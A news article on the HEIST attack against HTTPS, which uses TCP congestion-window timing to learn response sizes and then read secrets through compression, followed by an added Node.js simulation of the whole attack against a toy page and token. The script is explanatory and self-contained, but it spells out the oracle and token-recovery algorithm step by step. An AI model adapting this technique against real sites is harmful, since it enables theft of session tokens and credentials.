HEIST Attack Can Steal Confidential Data Including Banking Credentials from HTTPS-Encrypted Traffic
HTTPS is widely assumed to keep a site's users safe from eavesdroppers, which is why banks, email providers and other service providers serve their pages over encrypted connections. A new attack demonstrated at the Black Hat conference shows that encryption alone does not close every leak.
Called HEIST, the technique runs purely in the browser against SSL/TLS and other secure channels and, combined with earlier compression-based attacks, can expose passwords, email addresses, Social Security numbers and other sensitive data carried inside encrypted responses.
Two Belgian security researchers, Mathy Vanhoef and Tom Van Goethem, presented their latest work at the Black Hat security conference in Las Vegas. They named it HEIST, which stands for HTTP Encrypted Information can be Stolen through TCP-Windows.
HEIST works by pinning down the exact size of a response. Attacker-controlled JavaScript on an unrelated site triggers cross-origin requests to the target and measures whether the whole response arrived together with its first bytes or needed an extra round trip, which happens as soon as the response no longer fits in the server's initial TCP congestion window. By adjusting the amount of attacker-influenced data reflected into the page until it finds that boundary, the script learns the response's size to the byte. Because this is a guess-and-measure process with one request per guess, the attack can take a while. If the page is served over the next-generation HTTP/2 protocol, the time needed drops sharply, because HTTP/2 carries parallel requests natively over a single connection, so many guesses can be tested at once.
HEIST is a side-channel attack on HTTPS: rather than breaking the TLS encryption, it leaks the size of the encrypted data being exchanged. Knowing the size of a response does not by itself reveal its content. But when the server compresses a response that reflects attacker-supplied input alongside a secret such as a session or anti-CSRF token, a correct guess of the secret's next character compresses slightly better than a wrong one, and that one-byte difference is exactly what the size oracle detects. Repeating the measurement character by character lets the attacker read the secret out of traffic that was never decrypted.
The two presented their findings (PDF) at Black Hat on Wednesday.
The side channel sits at the TCP level: the way a response is split into segments and sent decides whether all of it arrives in one round trip, and that timing difference reveals the response's length to a script that can only see when its request completed. From there, the known compression attacks do the rest. "Compression-based attacks [such as CRIME and BREACH] can now be performed purely in the browser, by any malicious website or script, without requiring network access," the researchers said.
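As an added example (not code from the researchers' paper or from this article), the following Node.js script models the whole chain described above in one place: a server whose compressed response reflects a query parameter next to an anti-CSRF token, a TCP sender that needs an extra round trip once a response exceeds its initial congestion window, and an attacker who can only observe the gap between the first and last byte of a cross-origin response. Everything in it is constructed for the demonstration: the page markup, the token, the toy LZ77 compressor standing in for DEFLATE, the window size (10 segments of 1460 bytes, the RFC 6928 default) and all function names. The distinct CJK code units used as padding stand in for the random, incompressible bytes a real attack would reflect.

```javascript
'use strict';
// Added example (not from the HEIST paper): a self-contained model of the HEIST
// length oracle driving a BREACH-style compression attack. All names, the page,
// the token and the TCP/compression models are constructed for this demonstration.

const INITCWND_BYTES = 10 * 1460;  // initial congestion window: 10 segments of 1460 bytes
const RTT_MS = 50;                 // modelled round-trip time
const SECRET = '7f3a9c1e';         // constructed anti-CSRF token the attacker wants

// Constructed vulnerable page: a compressed response that reflects the "q"
// parameter next to a secret. No hex digit precedes a "</" in the static markup,
// so a wrong guess character never borrows a back-reference from the tail.
const PAGE_HEAD = '<html><head><title>Transfer</title></head><body>' +
  '<form action="/transfer" method="post">' +
  `<input type="hidden" name="csrf" value="${SECRET}">` +
  '<input name="amount"></form><div id="q">';
const PAGE_TAIL = '</div></body></html>';

const toUnits = (s) => Array.from(s, (ch) => ch.charCodeAt(0));

// Toy LZ77 (stand-in for DEFLATE): greedy longest match, minimum length 3.
// A literal costs 1 byte and a back-reference costs 3 (length + distance); the
// 32 KiB distance limit is ignored because the bodies here stay well below it.
const MIN_MATCH = 3, MAX_MATCH = 258;
function compressedSize(units) {
  const key = (p) => units[p] * 0x100000000 + units[p + 1] * 0x10000 + units[p + 2];
  const table = new Map(); // 3-gram -> earlier positions where it starts
  let i = 0, cost = 0;
  while (i < units.length) {
    let best = 0;
    if (i + MIN_MATCH <= units.length) {
      for (const start of table.get(key(i)) || []) {
        let len = 0;
        while (len < MAX_MATCH && i + len < units.length && units[start + len] === units[i + len]) len++;
        if (len > best) best = len;
      }
    }
    const step = best >= MIN_MATCH ? best : 1;
    cost += best >= MIN_MATCH ? 3 : 1;
    for (let p = i; p < i + step && p + MIN_MATCH <= units.length; p++) {
      const k = key(p);
      if (table.has(k)) table.get(k).push(p); else table.set(k, [p]);
    }
    i += step;
  }
  return cost;
}

// Server and network model. `pad` incompressible units (distinct CJK code units
// standing in for random bytes) are reflected before the attacker's probe. The
// first byte arrives after one RTT; a response larger than the initial window
// needs an extra round trip before its last byte arrives.
const requests = { count: 0 };
function render(probe, pad) {
  const padding = Array.from({ length: pad }, (_, i) => String.fromCharCode(0x4e00 + i)).join('');
  return toUnits(PAGE_HEAD + padding + probe + PAGE_TAIL);
}
function simulateFetch(probe, pad) {
  requests.count++;
  const wire = compressedSize(render(probe, pad));
  const extraRoundTrips = Math.ceil(wire / INITCWND_BYTES) - 1;
  return { responseStart: RTT_MS, responseEnd: RTT_MS * (1 + extraRoundTrips) };
}

// All the attacker's script can observe cross-origin: did the whole body arrive
// together with the headers (one window), or did it need another round trip?
function fitsInInitialWindow(probe, pad) {
  const t = simulateFetch(probe, pad);
  return t.responseEnd - t.responseStart < RTT_MS / 2;
}

// HEIST: binary-search the largest padding that still fits in one window.
// The exact compressed size then follows as window minus padding.
function measureCompressedSize(probe) {
  let lo = 0, hi = INITCWND_BYTES;   // invariant: fits(lo) is true, fits(hi) is false
  if (!fitsInInitialWindow(probe, lo)) throw new Error('base response already exceeds one window');
  while (hi - lo > 1) {
    const mid = (lo + hi) >> 1;
    if (fitsInInitialWindow(probe, mid)) lo = mid; else hi = mid;
  }
  return INITCWND_BYTES - lo;
}

// BREACH on top of the HEIST oracle: a correct next character extends the
// back-reference into the real token and saves one byte. Measure one candidate
// exactly, then pad so that only a response one byte shorter still fits.
function recoverSecret(length, alphabet = '0123456789abcdef') {
  const probe = (prefix, g) => `csrf" value="${prefix}${g}`;
  let known = '';
  for (let k = 0; k < length; k++) {
    const first = alphabet[0];
    const pad = INITCWND_BYTES - measureCompressedSize(probe(known, first)) + 1;
    const shorter = [...alphabet.slice(1)].filter((g) => fitsInInitialWindow(probe(known, g), pad));
    if (shorter.length > 1) throw new Error(`ambiguous guesses at position ${k}: ${shorter}`);
    known += shorter.length === 1 ? shorter[0] : first;  // nothing shorter: the reference candidate was right
  }
  return known;
}

if (typeof require !== 'undefined' && require.main === module) {
  const recovered = recoverSecret(SECRET.length);
  console.log(`recovered ${recovered} (${recovered === SECRET ? 'correct' : 'wrong'}) in ${requests.count} cross-origin requests`);
}
```

Running the script prints the recovered token and the number of cross-origin requests it cost. Each character takes roughly 30 requests in this model: about 15 to binary-search the exact size of one candidate, then one per remaining candidate at the boundary padding. That is the sequential cost the article alludes to; over HTTP/2 the per-candidate probes of each round can be in flight at the same time. One caveat the toy hides: real DEFLATE adds Huffman-coding noise to the one-byte difference, which the BREACH authors handled with additional measurements, whereas the toy compressor makes the difference exact so the oracle can be checked precisely.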